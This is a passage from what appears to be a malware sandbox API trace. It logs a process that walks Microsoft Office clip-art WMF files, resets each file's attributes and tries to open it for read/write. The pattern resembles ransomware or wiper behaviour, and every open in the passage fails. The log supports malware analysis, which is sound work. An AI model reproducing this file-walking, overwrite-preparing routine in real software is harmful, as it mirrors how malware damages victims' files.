dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.788] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.788] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.788] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.788] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.788] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18229_.WMF", dwFileAttributes=0x80) returned 0 [0135.789] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18229_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18229_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.789] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.789] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.789] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.789] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.790] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18230_.WMF", dwFileAttributes=0x80) returned 0 [0135.790] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18230_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18230_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.790] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.790] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.790] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.790] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.790] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18231_.WMF", dwFileAttributes=0x80) returned 0 [0135.790] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18231_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18231_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.790] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.790] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.790] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.790] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.791] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18232_.WMF", dwFileAttributes=0x80) returned 0 [0135.791] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18232_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18232_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.791] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.791] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.791] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.791] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.791] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18233_.WMF", dwFileAttributes=0x80) returned 0 [0135.792] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18233_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18233_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.792] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.792] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.792] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.792] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.792] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18234_.WMF", dwFileAttributes=0x80) returned 0 [0135.792] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18234_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.793] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.793] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.793] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.793] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.793] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18235_.WMF", dwFileAttributes=0x80) returned 0 [0135.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18235_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18235_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.793] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.793] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.793] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.793] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.793] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18236_.WMF", dwFileAttributes=0x80) returned 0 [0135.794] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18236_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18236_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.794] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.794] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.794] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.794] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.794] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18237_.WMF", dwFileAttributes=0x80) returned 0 [0135.795] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18237_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18237_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.795] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.795] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.795] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.795] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.795] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18238_.WMF", dwFileAttributes=0x80) returned 0 [0135.795] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18238_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18238_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.795] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.796] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.796] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.796] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.796] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18239_.WMF", dwFileAttributes=0x80) returned 0 [0135.796] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18239_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18239_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.796] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.796] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.796] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.796] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.796] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18241_.WMF", dwFileAttributes=0x80) returned 0 [0135.797] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18241_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18241_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.797] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.797] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.797] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.797] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.797] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18242_.WMF", dwFileAttributes=0x80) returned 0 [0135.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18242_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18242_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.798] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.798] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.798] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.798] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.798] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18243_.WMF", dwFileAttributes=0x80) returned 0 [0135.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18243_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18243_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.799] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.799] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.799] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.799] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.799] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18244_.WMF", dwFileAttributes=0x80) returned 0 [0135.799] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18244_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18244_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.799] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.799] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.799] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.800] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.800] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18245_.WMF", dwFileAttributes=0x80) returned 0 [0135.800] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18245_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18245_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.800] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.800] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.800] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.800] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.801] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18246_.WMF", dwFileAttributes=0x80) returned 0 [0135.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18246_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18246_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.802] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.802] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.802] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.802] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.802] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18247_.WMF", dwFileAttributes=0x80) returned 0 [0135.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18247_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18247_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.802] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.802] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.803] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.803] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.803] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18248_.WMF", dwFileAttributes=0x80) returned 0 [0135.803] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18248_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18248_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.803] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.803] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.803] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.803] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.804] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18249_.WMF", dwFileAttributes=0x80) returned 0 [0135.804] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18249_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18249_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.804] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.804] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.804] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.804] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.805] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18250_.WMF", dwFileAttributes=0x80) returned 0 [0135.805] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18250_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18250_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.805] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.805] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.806] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.806] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.806] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18251_.WMF", dwFileAttributes=0x80) returned 0 [0135.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18251_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18251_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.806] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.806] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.806] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.806] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.807] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18252_.WMF", dwFileAttributes=0x80) returned 0 [0135.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18252_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18252_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.807] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.807] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.807] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.807] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.807] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18253_.WMF", dwFileAttributes=0x80) returned 0 [0135.808] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18253_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18253_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.808] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.808] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.808] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.808] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.808] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18254_.WMF", dwFileAttributes=0x80) returned 0 [0135.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18254_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18254_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.809] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.809] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.809] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.809] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.810] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18255_.WMF", dwFileAttributes=0x80) returned 0 [0135.810] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18255_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18255_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.810] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.810] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.810] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.810] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.810] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18256_.WMF", dwFileAttributes=0x80) returned 0 [0135.811] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18256_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18256_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.811] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.811] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.811] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.811] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.811] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18257_.WMF", dwFileAttributes=0x80) returned 0 [0135.811] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18257_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18257_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.811] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.811] VirtualFree 